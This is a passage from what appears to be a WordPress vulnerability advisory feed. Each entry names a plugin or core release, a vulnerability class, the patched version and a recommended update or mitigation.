Vulnerability: Cross-Site Request Forgery via delete()
Patched Version: 4.4.3
Recommended Action: Update to version 4.4.3, or a newer patched version

Plugin: Cleverwise Daily Quotes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Missing Authorization
Patched Version: 5.6.7
Recommended Action: Update to version 5.6.7, or a newer patched version

Plugin: WP Hotel Booking

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.6
Recommended Action: Update to version 1.10.6, or a newer patched version

Core: WordPress

Vulnerability: Password Reset Link Non-Expiration
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: Subscribe2 – Form, Email Subscribers & Newsletters

Vulnerability: Stored Cross-Site Scripting
Patched Version: 10.16
Recommended Action: Update to version 10.16, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Information Disclosure
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: Easy Call With Twilio

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Count per Day

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 2.46.1
Recommended Action: Update to version 2.46.1, or a newer patched version

Plugin: Vimeotheque: Vimeo WordPress Plugin

Vulnerability: Reflected Cross-Site Scripting via ‘view’ and ‘page’
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Authenticated (Subscriber+) PHP Object Injection
Patched Version: 3.11.2
Recommended Action: Update to version 3.11.2, or a newer patched version

Plugin: Logo Slider – Logo Carousel, Logo Showcase & Client Logo Slider Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: WP-FormAssembly

Vulnerability: Authenticated (Contributor+) Arbitrary File Read
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Simple Social Media Share Buttons – Social Sharing for Everyone

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Hitsteps Web Analytics

Vulnerability: Cross-Site Request Forgery via hst_optionpage
Patched Version: 5.87
Recommended Action: Update to version 5.87, or a newer patched version

Plugin: Super Progressive Web Apps

Vulnerability: Missing Authorization
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Finale Lite – Sales Countdown Timer & Discount for WooCommerce

Vulnerability: Missing Authorization to Content Deletion
Patched Version: 2.17.0
Recommended Action: Update to version 2.17.0, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 5.6.6
Recommended Action: Update to version 5.6.6, or a newer patched version

Plugin: Recipe Cards For Your Food Blog from Zip Recipes

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.0.8
Recommended Action: Update to version 8.0.8, or a newer patched version

Plugin: cformsII

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clio Grow Form

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Fathom Analytics for WP

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.0.1
Recommended Action: Update to version 1.2.0.1, or a newer patched version

Plugin: Variation Swatches for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: vSlider Multi Image Slider for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Editor

Vulnerability: Incorrect Permission Assignment or Protection
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Core: WordPress

Vulnerability: Cross-domain Flash injection
Patched Version: 3.7.25
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.25, 3.8.25, 3.9.24, 4.0.22, 4.1.22, 4.2.19, 4.3.15, 4.4.14, 4.5.13, 4.6.10, 4.7.9, 4.8.5, 4.9.2

Plugin: FormCraft – Form Builder

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: HTML2WP

Vulnerability: Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Visibility Logic for Elementor

Vulnerability: Missing Authorization via admin_post ‘toggle_option’
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: WP Time Slots Booking Form

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.82
Recommended Action: Update to version 1.1.82, or a newer patched version

Plugin: google-analytics-premium

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.15
Recommended Action: Update to version 8.15, or a newer patched version

Plugin: Pondol Form to Mail

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 多合一搜索自动推送管理插件-支持Baidu/Google/Bing/IndexNow/Yandex/头条

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.6
Recommended Action: Update to version 4.2.6, or a newer patched version

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.62
Recommended Action: Update to version 6.62, or a newer patched version

Plugin: Sell Downloads

Vulnerability: Arbitrary File Read
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Widget Responsive for Youtube

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Infogram – Add charts, maps and infographics

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Cross-Site Request Forgery to Arbitrary Post Deletion
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Contact Form Clean and Simple

Vulnerability: Cross-Site Scripting
Patched Version: 4.4.1
Recommended Action: Update to version 4.4.1, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: SQL Injection
Patched Version: 9.0.3
Recommended Action: Update to version 9.0.3, or a newer patched version

Plugin: AI Powered Starter Templates by Kadence WP

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 1.2.17
Recommended Action: Update to version 1.2.17, or a newer patched version

Plugin: Form builder to get in touch with visitors and grow your email list — Happyforms

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Blocks
Patched Version: 1.22.0
Recommended Action: Update to version 1.22.0, or a newer patched version

Plugin: Realteo

Vulnerability: Missing Authorization
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Lara's Google Analytics (GA4)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Customizer Export/Import

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Local/Remote File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popular Posts by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Core: WordPress

Vulnerability: Username Enumeration
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: CSV Injection
Patched Version: 1.12.22
Recommended Action: Update to version 1.12.22, or a newer patched version

Plugin: avalex – Automatisch sichere Rechtstexte

Vulnerability: Missing Authorization
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: Online Booking & Scheduling Calendar for WordPress by vcita

Vulnerability: Missing Authorization to Account Logout
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: WP Chat App

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.8.1.2
Recommended Action: Update to version 5.8.1.2, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: HTML Injection in Emails
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Authenticated Remote Code Execution
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Custom Fields Search by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: The Events Calendar: Eventbrite Tickets

Vulnerability: Cross-Site Scripting
Patched Version: 3.10.2
Recommended Action: Update to version 3.10.2, or a newer patched version

Plugin: WP Voting Contest Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 5.5.2
Recommended Action: Update to version 5.5.2, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Cross-Site Request Forgery to Privilege Escalation
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: 404 Solution

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.33.1
Recommended Action: Update to version 2.33.1, or a newer patched version

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Multiple Admin+ Stored Cross-Site Scripting
Patched Version: 5.4.1
Recommended Action: Update to version 5.4.1, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Subscriber+ Arbitrary Country Ban
Patched Version: 2.26.5
Recommended Action: Update to version 2.26.5, or a newer patched version

Plugin: Newsletter

Vulnerability: Arbitrary File Read
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Missing Authorization
Patched Version: 3.2.11
Recommended Action: Update to version 3.2.11, or a newer patched version

Plugin: WordThumb

Vulnerability: Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Related Posts by Zemanta

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: Coming Soon Page & Maintenance Mode

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: ACF to REST API

Vulnerability: Insecure direct object reference via permalinks manipulation
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Aruba HiSpeed Cache

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: xPinner Lite

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: Not specified in this listing (affects versions <= 6.4.1)
Patched Version: 6.4.2
Recommended Action: Update to version 6.4.2, or a newer patched version

Plugin: MainWP Dashboard: WordPress Management without the SaaS

Vulnerability: Authenticated (Administrator+) CSS Injection
Patched Version: 4.5.1.3
Recommended Action: Update to version 4.5.1.3, or a newer patched version

Plugin: WP TFeed

Vulnerability: Cross-Site Request Forgery via aptf_delete_cache
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TheCartPress eCommerce Shopping Cart

Vulnerability: Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: پلاگین پرداخت دلخواه (Persian plugin name; approximately "Custom Amount Payment Plugin")

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: Active Products Tables for WooCommerce. Use constructor to create tables 

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Cardoza AJAX Search

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Read More & Accordion

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: GamiPress – Vimeo integration

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Simple Social Media Share Buttons – Social Sharing for Everyone

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP-Appbox

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.3.21
Recommended Action: Update to version 4.3.21, or a newer patched version

Plugin: Marmoset Viewer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Child Theme Generator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Direct Checkout for WooCommerce – Skip Cart with Buy Buttons

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: WP Helper Premium

Vulnerability: Cross-Site Request Forgery via whp_fields
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: SQL Injection
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Page Generator

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Stored Cross-Site Scripting via lastName
Patched Version: 1.0.47
Recommended Action: Update to version 1.0.47, or a newer patched version

Plugin: WebLibrarian

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.8.5
Recommended Action: Update to version 3.4.8.5, or a newer patched version

Plugin: JetElements

Vulnerability: Authenticated (Contributor+) Remote Code Execution
Patched Version: 2.6.11
Recommended Action: Update to version 2.6.11, or a newer patched version

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.9.35.1
Recommended Action: Update to version 4.9.35.1, or a newer patched version

Plugin: DOOFINDER Search and Discovery for WP & WooCommerce

Vulnerability: Unauthenticated Open Redirect
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Keep Backup Daily

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: iframe

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Weaver Xtreme Theme Support

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.2.7
Recommended Action: Update to version 6.2.7, or a newer patched version

Plugin: LoginPress | wp-login Custom Login Page Customizer

Vulnerability: Authenticated SQL Injection via Settings Import
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Plugin: Email Before Download

Vulnerability: SQL Injection
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Shortcodes and extra features for Phlox theme

Vulnerability: PHP Object Injection
Patched Version: 2.10.7
Recommended Action: Update to version 2.10.7, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: Matterport Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Timetable and Event Schedule by MotoPress

Vulnerability: Unauthorized Event TimeSlot Deletion
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.10
Recommended Action: Update to version 2.1.10, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Reflected Cross-Site Scripting
Patched Version: .47.1
Recommended Action: Update to version .47.1, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Not specified in this listing (affects versions <= 1.9.57)
Patched Version: 1.9.58
Recommended Action: Update to version 1.9.58, or a newer patched version

Plugin: Easy Hide Login

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: BackUpWordPress

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Information Disclosure
Patched Version: 3.13
Recommended Action: Update to version 3.13, or a newer patched version

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Authenticated (Admin+) Arbitrary File Deletion
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Floating Action Button

Vulnerability: Missing Authorization
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Enhanced Text Widget

Vulnerability: Missing Authorization
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Download Monitor

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: mTouch Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Cryptocurrency All-in-One

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Recipe Notes
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: MarketPress – WordPress eCommerce

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: BadgeOS

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Flow-Flow Social Feed Stream

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.72
Recommended Action: Update to version 3.0.72, or a newer patched version

Plugin: Order Delivery Date for WP e-Commerce

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Zephyr Project Manager

Vulnerability: Missing Authorization to Cross-Site Scripting
Patched Version: 3.2.55
Recommended Action: Update to version 3.2.55, or a newer patched version

Plugin: uncode-core

Vulnerability: Authenticated (Subscriber+) Arbitrary File Deletion
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: Save as Image Plugin by Pdfcrowd

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 2.16.1
Recommended Action: Update to version 2.16.1, or a newer patched version

Plugin: Events Manager Pro

Vulnerability: Unauthenticated CSV Injection
Patched Version: 2.6.7.2
Recommended Action: Update to version 2.6.7.2, or a newer patched version

Plugin: BestWebSoft's Twitter

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Custom Post Type Relations

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wbcom Designs – BuddyPress Member Reviews

Vulnerability: Arbitrary Plugin Installation, Activation and Deactivation
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Login Configurator

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: Flyzoo Chat

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPDating

Vulnerability: SQL Injection
Patched Version: 7.4.1
Recommended Action: Update to version 7.4.1, or a newer patched version

Plugin: Post to CSV by BestWebSoft

Vulnerability: Authenticated (Author+) CSV Injection
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: WordPress Button Plugin MaxButtons

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: Email Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 20.13.7
Recommended Action: Update to version 20.13.7, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: Not specified in this listing (affects versions <= 6.4.4)
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: Smash Balloon Social Post Feed – Simple Social Feeds for WordPress

Vulnerability: Arbitrary Plugin Settings Update to Stored Cross-Site Scripting
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: WPForms Google Sheet Connector Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Sticky Ad Bar Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cost Calculator

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Admin Word Count Column

Vulnerability: Unauthenticated Arbitrary File Read
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Field Template

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Missing Authorization
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.26
Recommended Action: Update to version 4.3.26, or a newer patched version

Plugin: Asset CleanUp: Page Speed Booster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.8.5
Recommended Action: Update to version 1.3.8.5, or a newer patched version

Plugin: Lazyest Gallery

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.21
Recommended Action: Update to version 1.1.21, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Cross-Site Scripting
Patched Version: 4.16.4
Recommended Action: Update to version 4.16.4, or a newer patched version

Plugin: Mail Subscribe List

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: TK Google Fonts GDPR Compliant

Vulnerability: Missing Authorization to Font Addition
Patched Version: 2.2.12
Recommended Action: Update to version 2.2.12, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.13.54
Recommended Action: Update to version 7.13.54, or a newer patched version

Plugin: Scheduled Announcements Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery

Vulnerability: Missing Authorization in pgc_sgb_action_wizard
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Word Search Puzzles game

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
